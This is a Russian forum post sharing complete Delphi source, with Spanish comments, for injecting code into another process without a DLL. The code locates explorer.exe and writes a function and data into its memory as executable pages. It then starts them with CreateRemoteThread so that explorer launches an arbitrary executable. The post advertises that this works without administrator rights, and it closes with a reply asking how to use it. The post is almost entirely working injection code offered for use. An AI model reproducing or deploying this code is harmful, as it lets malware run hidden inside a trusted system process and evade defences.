Инжект без использования DLL [Delphi]

Пример исходного кода инжекта без использования DLL на Delphi. Работает на х86 / x64 без «SetDebugPrivileges» и прав Администратора. Написано на Delphi XE2, если будете компилировать в другом, потребуются маленькие изменения.

Код:

 
//******************************************************************************
//* UNIT:        UNT_InjectNoDLL
//* AUTOR:        Fakedo0r
//******************************************************************************
Unit UNT_InjectNoDLL;
//******************************************************************************
//DECLARACION DE LIBRERIAS / CLASES
//******************************************************************************
Interface
 
Uses
  Winapi.Windows, TLHelp32, PsAPI, ShellAPI;
//******************************************************************************
//DECLARACION DE ESTRUCTURAS
//******************************************************************************
Type
  PTINJECT = ^TINJECT;
 
  TINJECT = Record
    __ShellExecute: Function(HWND: HWND; Operation, FileName, Parameters,
      Directory: PWideChar; ShowCmd: Integer): HINST; Stdcall;
 
    cExe: Array [0 .. MAX_PATH] Of Char;
    cOper: Array [0 .. MAX_PATH] Of Char;
  End;
//******************************************************************************
//DECLARACION DE FUNCIONES / PROCEDIMIENTOS
//******************************************************************************
Procedure Inyectada(tInj: PTINJECT); Stdcall;
Procedure Inyectora;
Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  iBuffSize: Int64): Pointer;
//******************************************************************************
Implementation
//******************************************************************************
//<--- LA FUNCION QUE VAMOS A INYECTAR --->
//******************************************************************************
Procedure Inyectada(tInj: PTINJECT); Stdcall;
Begin
  tInj.__ShellExecute(0, tInj.cOper, tInj.cExe, Nil, Nil, 1);
End;
//******************************************************************************
//<--- LA FUNCION QUE OPERA LA INYECCION --->
//******************************************************************************
Procedure Inyectora;
Var
  uTamFun:    UINT;
  dwPID:      DWORD;
  dwExitCode: DWORD;
  hThread:    THandle;
  hProcess:  THandle;
  ptStruct:  Pointer;
  ptEsp:      Pointer;
  tProcEntry: TProcessEntry32;
  tInj:      TINJECT;
Begin
  uTamFun := 0;
  dwExitCode := 0;
  hProcess := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  tProcEntry.dwSize := Sizeof(tProcEntry);
 
  If Process32First(hProcess, tProcEntry) Then
  Begin
    Repeat
      If tProcEntry.szExeFile = 'explorer.exe' Then
      Begin
        dwPID := tProcEntry.th32ProcessID;
        Break;
      End;
    Until Not Process32Next(hProcess, tProcEntry);
  End;
 
  CloseHandle(hProcess);
 
  // obtenemos el handle del proceso
  hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwPID);
 
  // obtenemos el puntero del api
  @tInj.__ShellExecute := GetProcAddress(LoadLibrary('Shell32.dll'),
    'ShellExecuteW');
 
  // copiamos los datos en las variables
  lstrcpy(tInj.cExe, PChar('D:\1.exe'));
  lstrcpy(tInj.cOper, PChar('open'));
 
  // reservamos y copiamos nuestra estructura a la memoria
  ptStruct := AllocAndCopyMem(hProcess, @tInj, Sizeof(TINJECT));
 
  // calculamos el tamaño de nuestra funcion
  uTamFun := UINT(@Inyectora) - UINT(@Inyectada);
 
  // reservamos y copiamos nuestra funcion a la memoria
  ptEsp := AllocAndCopyMem(hProcess, @Inyectada, uTamFun);
 
  // creamos el hilo remoto
  hThread := CreateRemoteThread(hProcess, Nil, 0, ptEsp, ptStruct, 0,
    PDWORD(Nil)^);
 
  If hThread <> 0 Then
  Begin
    // esperamos hasta que se cree el hilo
    WaitForSingleObject(hThread, INFINITE);
    // obtenemos el estado de terminacion del hilo
    GetExitCodeThread(hThread, dwExitCode);
    // liberamos el handle del hilo creado
    CloseHandle(hThread);
    // liberamos el espacio en el proceso
    VirtualFreeEx(hProcess, ptStruct, 0, MEM_RELEASE);
    VirtualFreeEx(hProcess, ptEsp, 0, MEM_RELEASE);
  End;
 
  // liberamos el handle del proceso
  CloseHandle(hProcess);
End;
//******************************************************************************
//<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->
//******************************************************************************
Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  iBuffSize: Int64): Pointer;
Var
  iBytesWritten: SIZE_T;
Begin
  iBytesWritten := 0;
  // reservamos espacio
  Result := VirtualAllocEx(hProcess, Nil, iBuffSize, MEM_COMMIT Or MEM_RESERVE,
    PAGE_EXECUTE_READWRITE);
  // escribimos
  WriteProcessMemory(hProcess, Result, ptBuffer, iBuffSize, iBytesWritten);
End;
 
End.

 

А как использовать ?